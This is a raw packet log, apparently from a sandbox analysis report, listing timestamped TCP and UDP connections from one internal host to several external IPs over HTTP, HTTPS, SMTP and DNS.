May 1, 2024 15:17:29.664243937 CEST	49733	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:29.815459013 CEST	443	49734	104.21.67.152	192.168.2.6
May 1, 2024 15:17:29.817473888 CEST	49734	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:29.817491055 CEST	443	49734	104.21.67.152	192.168.2.6
May 1, 2024 15:17:30.417041063 CEST	443	49734	104.21.67.152	192.168.2.6
May 1, 2024 15:17:30.417145014 CEST	443	49734	104.21.67.152	192.168.2.6
May 1, 2024 15:17:30.417231083 CEST	49734	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:30.417670965 CEST	49734	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:30.423249006 CEST	49735	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:30.575412989 CEST	80	49735	158.101.44.242	192.168.2.6
May 1, 2024 15:17:30.575481892 CEST	49735	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:30.575742006 CEST	49735	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:30.727904081 CEST	80	49735	158.101.44.242	192.168.2.6
May 1, 2024 15:17:30.729648113 CEST	80	49735	158.101.44.242	192.168.2.6
May 1, 2024 15:17:30.730994940 CEST	49736	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:30.731050968 CEST	443	49736	104.21.67.152	192.168.2.6
May 1, 2024 15:17:30.731159925 CEST	49736	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:30.731648922 CEST	49736	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:30.731677055 CEST	443	49736	104.21.67.152	192.168.2.6
May 1, 2024 15:17:30.864231110 CEST	49735	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:30.927664995 CEST	443	49736	104.21.67.152	192.168.2.6
May 1, 2024 15:17:30.929527044 CEST	49736	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:30.929546118 CEST	443	49736	104.21.67.152	192.168.2.6
May 1, 2024 15:17:31.167531967 CEST	443	49736	104.21.67.152	192.168.2.6
May 1, 2024 15:17:31.167639971 CEST	443	49736	104.21.67.152	192.168.2.6
May 1, 2024 15:17:31.167920113 CEST	49736	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:31.168832064 CEST	49736	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:31.172544003 CEST	49735	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:31.173710108 CEST	49737	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:31.325849056 CEST	80	49737	158.101.44.242	192.168.2.6
May 1, 2024 15:17:31.325936079 CEST	49737	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:31.326097965 CEST	49737	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:31.326672077 CEST	80	49735	158.101.44.242	192.168.2.6
May 1, 2024 15:17:31.326728106 CEST	49735	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:31.478121042 CEST	80	49737	158.101.44.242	192.168.2.6
May 1, 2024 15:17:31.513133049 CEST	80	49737	158.101.44.242	192.168.2.6
May 1, 2024 15:17:31.523660898 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:31.523700953 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:31.524807930 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:31.599214077 CEST	49737	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:31.669080973 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:31.669101000 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:31.868635893 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:32.076126099 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:32.076750994 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:32.597896099 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:32.597914934 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:33.054441929 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:33.054533958 CEST	443	49738	104.21.67.152	192.168.2.6
May 1, 2024 15:17:33.054577112 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:33.055532932 CEST	49738	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:33.088841915 CEST	49737	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:33.090224981 CEST	49739	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:33.245526075 CEST	80	49739	158.101.44.242	192.168.2.6
May 1, 2024 15:17:33.245595932 CEST	49739	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:33.245836020 CEST	49739	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:33.255243063 CEST	80	49737	158.101.44.242	192.168.2.6
May 1, 2024 15:17:33.255285978 CEST	49737	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:33.401072025 CEST	80	49739	158.101.44.242	192.168.2.6
May 1, 2024 15:17:33.690573931 CEST	80	49739	158.101.44.242	192.168.2.6
May 1, 2024 15:17:33.692527056 CEST	49740	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:33.692553997 CEST	443	49740	104.21.67.152	192.168.2.6
May 1, 2024 15:17:33.692616940 CEST	49740	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:33.692908049 CEST	49740	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:33.692919970 CEST	443	49740	104.21.67.152	192.168.2.6
May 1, 2024 15:17:33.787250996 CEST	49739	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:33.890008926 CEST	443	49740	104.21.67.152	192.168.2.6
May 1, 2024 15:17:33.891721964 CEST	49740	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:33.891736984 CEST	443	49740	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.134962082 CEST	443	49740	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.135051012 CEST	443	49740	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.135257959 CEST	49740	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.135744095 CEST	49740	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.140341043 CEST	49739	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.142009020 CEST	49741	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.298012018 CEST	80	49741	158.101.44.242	192.168.2.6
May 1, 2024 15:17:34.299590111 CEST	49741	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.299757004 CEST	49741	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.303227901 CEST	80	49739	158.101.44.242	192.168.2.6
May 1, 2024 15:17:34.303301096 CEST	49739	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.455566883 CEST	80	49741	158.101.44.242	192.168.2.6
May 1, 2024 15:17:34.456650019 CEST	80	49741	158.101.44.242	192.168.2.6
May 1, 2024 15:17:34.458058119 CEST	49742	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.458089113 CEST	443	49742	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.458168983 CEST	49742	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.458477974 CEST	49742	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.458487034 CEST	443	49742	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.655509949 CEST	443	49742	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.657547951 CEST	49742	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.657571077 CEST	443	49742	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.671632051 CEST	49741	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.899207115 CEST	443	49742	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.899360895 CEST	443	49742	104.21.67.152	192.168.2.6
May 1, 2024 15:17:34.900190115 CEST	49742	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.900482893 CEST	49742	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:34.903501987 CEST	49741	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:34.904500961 CEST	49743	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:35.056193113 CEST	80	49743	158.101.44.242	192.168.2.6
May 1, 2024 15:17:35.056267023 CEST	49743	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:35.056392908 CEST	49743	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:35.059381962 CEST	80	49741	158.101.44.242	192.168.2.6
May 1, 2024 15:17:35.059463978 CEST	49741	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:35.208103895 CEST	80	49743	158.101.44.242	192.168.2.6
May 1, 2024 15:17:35.208826065 CEST	80	49743	158.101.44.242	192.168.2.6
May 1, 2024 15:17:35.210068941 CEST	49744	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:35.210139036 CEST	443	49744	104.21.67.152	192.168.2.6
May 1, 2024 15:17:35.210261106 CEST	49744	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:35.210508108 CEST	49744	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:35.210529089 CEST	443	49744	104.21.67.152	192.168.2.6
May 1, 2024 15:17:35.249695063 CEST	49743	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:35.411835909 CEST	443	49744	104.21.67.152	192.168.2.6
May 1, 2024 15:17:35.413542032 CEST	49744	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:35.413580894 CEST	443	49744	104.21.67.152	192.168.2.6
May 1, 2024 15:17:35.663836002 CEST	443	49744	104.21.67.152	192.168.2.6
May 1, 2024 15:17:35.663943052 CEST	443	49744	104.21.67.152	192.168.2.6
May 1, 2024 15:17:35.664011002 CEST	49744	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:35.678328037 CEST	49744	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:35.776010036 CEST	49743	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:35.928821087 CEST	80	49743	158.101.44.242	192.168.2.6
May 1, 2024 15:17:35.932878971 CEST	49743	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:38.079478025 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:17:38.079507113 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:17:38.079572916 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:17:38.080387115 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:17:38.080401897 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:17:38.284830093 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:17:38.284899950 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:17:38.288103104 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:17:38.288109064 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:17:38.288327932 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:17:38.291218042 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:17:38.332118988 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:18:17.263103008 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:18:17.263161898 CEST	443	49745	172.67.169.18	192.168.2.6
May 1, 2024 15:18:17.263246059 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:18:17.267843962 CEST	49745	443	192.168.2.6	172.67.169.18
May 1, 2024 15:18:22.777980089 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:22.962574005 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:22.962658882 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:23.203701973 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:23.203963995 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:23.389377117 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:23.395678043 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:23.581990004 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:23.640901089 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:23.655757904 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:23.842849016 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:23.892889023 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.309128046 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.493947983 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:24.496265888 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.694298029 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:24.730072975 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.914824009 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:24.914940119 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:24.968508959 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.979512930 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.979562998 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.979578972 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:24.979598045 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:25.164247990 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:25.165400028 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:25.218488932 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:34.616270065 CEST	80	49733	158.101.44.242	192.168.2.6
May 1, 2024 15:18:34.616342068 CEST	49733	80	192.168.2.6	158.101.44.242
May 1, 2024 15:18:35.618192911 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:35.843211889 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.004209042 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.004340887 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.004379034 CEST	49750	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.005245924 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.188891888 CEST	587	49750	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.189624071 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.189697981 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.425878048 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.426166058 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.611047029 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.611226082 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.796236038 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.796428919 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:36.982484102 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:36.982645035 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.167573929 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.167742968 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.365413904 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.365582943 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.550180912 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.550287008 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.550574064 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.550622940 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.550643921 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.550667048 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.735152960 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.735194921 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.736639023 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:37.737063885 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:37.962054014 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.122791052 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.122895956 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.122941017 CEST	49751	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.123917103 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.307353020 CEST	587	49751	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.309206963 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.309276104 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.547389030 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.561496019 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.747147083 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.796613932 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.796757936 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:38.982598066 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:38.982912064 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.170084000 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:39.212426901 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.398041964 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:39.452255011 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.652631998 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:39.702904940 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.789217949 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.974868059 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:39.974926949 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:39.976645947 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.976680994 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.976694107 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:39.976706982 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:40.162198067 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:40.164144039 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:40.164619923 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:40.392764091 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:40.552539110 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:40.552628040 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:40.556030035 CEST	49752	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:40.558820009 CEST	49753	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:40.741318941 CEST	587	49752	108.167.142.65	192.168.2.6
May 1, 2024 15:18:40.744223118 CEST	587	49753	108.167.142.65	192.168.2.6
May 1, 2024 15:18:41.249772072 CEST	49753	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:41.435426950 CEST	587	49753	108.167.142.65	192.168.2.6
May 1, 2024 15:18:41.937273979 CEST	49753	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:42.122714043 CEST	587	49753	108.167.142.65	192.168.2.6
May 1, 2024 15:18:42.624890089 CEST	49753	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:42.810496092 CEST	587	49753	108.167.142.65	192.168.2.6
May 1, 2024 15:18:43.312259912 CEST	49753	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:43.497885942 CEST	587	49753	108.167.142.65	192.168.2.6
May 1, 2024 15:18:44.009793997 CEST	49754	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:44.194432974 CEST	587	49754	108.167.142.65	192.168.2.6
May 1, 2024 15:18:44.702930927 CEST	49754	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:44.888159037 CEST	587	49754	108.167.142.65	192.168.2.6
May 1, 2024 15:18:45.390400887 CEST	49754	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:45.574919939 CEST	587	49754	108.167.142.65	192.168.2.6
May 1, 2024 15:18:46.078037977 CEST	49754	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:46.262587070 CEST	587	49754	108.167.142.65	192.168.2.6
May 1, 2024 15:18:46.765403032 CEST	49754	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:46.950117111 CEST	587	49754	108.167.142.65	192.168.2.6
May 1, 2024 15:18:46.951920986 CEST	49755	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:47.138076067 CEST	587	49755	108.167.142.65	192.168.2.6
May 1, 2024 15:18:47.656028032 CEST	49755	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:47.841789007 CEST	587	49755	108.167.142.65	192.168.2.6
May 1, 2024 15:18:48.343559980 CEST	49755	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:48.529747963 CEST	587	49755	108.167.142.65	192.168.2.6
May 1, 2024 15:18:49.031049013 CEST	49755	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:49.216945887 CEST	587	49755	108.167.142.65	192.168.2.6
May 1, 2024 15:18:49.734193087 CEST	49755	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:49.920054913 CEST	587	49755	108.167.142.65	192.168.2.6
May 1, 2024 15:18:50.302122116 CEST	49756	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:50.488837957 CEST	587	49756	108.167.142.65	192.168.2.6
May 1, 2024 15:18:50.999799013 CEST	49756	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:51.185117006 CEST	587	49756	108.167.142.65	192.168.2.6
May 1, 2024 15:18:51.687289000 CEST	49756	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:51.872592926 CEST	587	49756	108.167.142.65	192.168.2.6
May 1, 2024 15:18:52.374789953 CEST	49756	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:52.560072899 CEST	587	49756	108.167.142.65	192.168.2.6
May 1, 2024 15:18:53.062320948 CEST	49756	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:53.247689009 CEST	587	49756	108.167.142.65	192.168.2.6
May 1, 2024 15:18:53.249155045 CEST	49757	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:53.434462070 CEST	587	49757	108.167.142.65	192.168.2.6
May 1, 2024 15:18:53.952898026 CEST	49757	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:54.141057968 CEST	587	49757	108.167.142.65	192.168.2.6
May 1, 2024 15:18:54.656085968 CEST	49757	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:54.841451883 CEST	587	49757	108.167.142.65	192.168.2.6
May 1, 2024 15:18:55.343914032 CEST	49757	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:55.529319048 CEST	587	49757	108.167.142.65	192.168.2.6
May 1, 2024 15:18:56.031044006 CEST	49757	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:56.216305017 CEST	587	49757	108.167.142.65	192.168.2.6
May 1, 2024 15:18:56.218071938 CEST	49759	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:56.402889013 CEST	587	49759	108.167.142.65	192.168.2.6
May 1, 2024 15:18:56.906035900 CEST	49759	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:57.093338966 CEST	587	49759	108.167.142.65	192.168.2.6
May 1, 2024 15:18:57.609185934 CEST	49759	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:57.794194937 CEST	587	49759	108.167.142.65	192.168.2.6
May 1, 2024 15:18:58.296696901 CEST	49759	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:58.481837034 CEST	587	49759	108.167.142.65	192.168.2.6
May 1, 2024 15:18:58.984283924 CEST	49759	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:59.169251919 CEST	587	49759	108.167.142.65	192.168.2.6
May 1, 2024 15:18:59.171097994 CEST	49760	587	192.168.2.6	108.167.142.65
May 1, 2024 15:18:59.356015921 CEST	587	49760	108.167.142.65	192.168.2.6
May 1, 2024 15:18:59.859180927 CEST	49760	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:00.044143915 CEST	587	49760	108.167.142.65	192.168.2.6
May 1, 2024 15:19:00.546741962 CEST	49760	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:00.731735945 CEST	587	49760	108.167.142.65	192.168.2.6
May 1, 2024 15:19:01.249875069 CEST	49760	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:01.434879065 CEST	587	49760	108.167.142.65	192.168.2.6
May 1, 2024 15:19:01.937344074 CEST	49760	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:02.122391939 CEST	587	49760	108.167.142.65	192.168.2.6
May 1, 2024 15:19:02.124128103 CEST	49761	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:02.308702946 CEST	587	49761	108.167.142.65	192.168.2.6
May 1, 2024 15:19:02.812334061 CEST	49761	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:02.996892929 CEST	587	49761	108.167.142.65	192.168.2.6
May 1, 2024 15:19:03.499803066 CEST	49761	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:03.685986996 CEST	587	49761	108.167.142.65	192.168.2.6
May 1, 2024 15:19:04.187315941 CEST	49761	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:04.371906042 CEST	587	49761	108.167.142.65	192.168.2.6
May 1, 2024 15:19:04.874800920 CEST	49761	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:05.059472084 CEST	587	49761	108.167.142.65	192.168.2.6
May 1, 2024 15:19:05.060961008 CEST	49762	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:05.246278048 CEST	587	49762	108.167.142.65	192.168.2.6
May 1, 2024 15:19:05.749845028 CEST	49762	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:05.934591055 CEST	587	49762	108.167.142.65	192.168.2.6
May 1, 2024 15:19:06.437289000 CEST	49762	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:06.622775078 CEST	587	49762	108.167.142.65	192.168.2.6
May 1, 2024 15:19:07.140434980 CEST	49762	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:07.325227022 CEST	587	49762	108.167.142.65	192.168.2.6
May 1, 2024 15:19:07.843709946 CEST	49762	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:08.029758930 CEST	587	49762	108.167.142.65	192.168.2.6
May 1, 2024 15:19:09.297455072 CEST	49763	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:09.481966972 CEST	587	49763	108.167.142.65	192.168.2.6
May 1, 2024 15:19:09.984220982 CEST	49763	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:10.168711901 CEST	587	49763	108.167.142.65	192.168.2.6
May 1, 2024 15:19:10.671674013 CEST	49763	587	192.168.2.6	108.167.142.65
May 1, 2024 15:19:10.859906912 CEST	587	49763	108.167.142.65	192.168.2.6
May 1, 2024 15:19:11.374806881 CEST	49763	587	192.168.2.6	108.167.142.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 1, 2024 15:17:07.035820961 CEST	64784	53	192.168.2.6	1.1.1.1
May 1, 2024 15:17:07.131959915 CEST	53	64784	1.1.1.1	192.168.2.6
May 1, 2024 15:17:25.588433981 CEST	62736	53	192.168.2.6	1.1.1.1
May 1, 2024 15:17:25.684051991 CEST	53	62736	1.1.1.1	192.168.2.6
May 1, 2024 15:17:26.640476942 CEST	54285	53	192.168.2.6	1.1.1.1
May 1, 2024 15:17:26.736293077 CEST	53	54285	1.1.1.1	192.168.2.6
May 1, 2024 15:17:35.775613070 CEST	63963	53	192.168.2.6	1.1.1.1
May 1, 2024 15:17:36.137491941 CEST	53	63963	1.1.1.1	192.168.2.6
May 1, 2024 15:17:50.204247952 CEST	58613	53	192.168.2.6	1.1.1.1
May 1, 2024 15:17:50.568850994 CEST	53	58613	1.1.1.1	192.168.2.6
May 1, 2024 15:18:15.656567097 CEST	60254	53	192.168.2.6	1.1.1.1
May 1, 2024 15:18:15.757297039 CEST	53	60254	1.1.1.1	192.168.2.6
May 1, 2024 15:18:22.534912109 CEST	63587	53	192.168.2.6	1.1.1.1
May 1, 2024 15:18:22.776578903 CEST	53	63587	1.1.1.1	192.168.2.6
May 1, 2024 15:18:40.891232014 CEST	65520	53	192.168.2.6	1.1.1.1
May 1, 2024 15:18:41.187397957 CEST	53	65520	1.1.1.1	192.168.2.6
May 1, 2024 15:19:06.547940016 CEST	63477	53	192.168.2.6	1.1.1.1
May 1, 2024 15:19:06.714584112 CEST	53	63477	1.1.1.1	192.168.2.6

DNS Queries

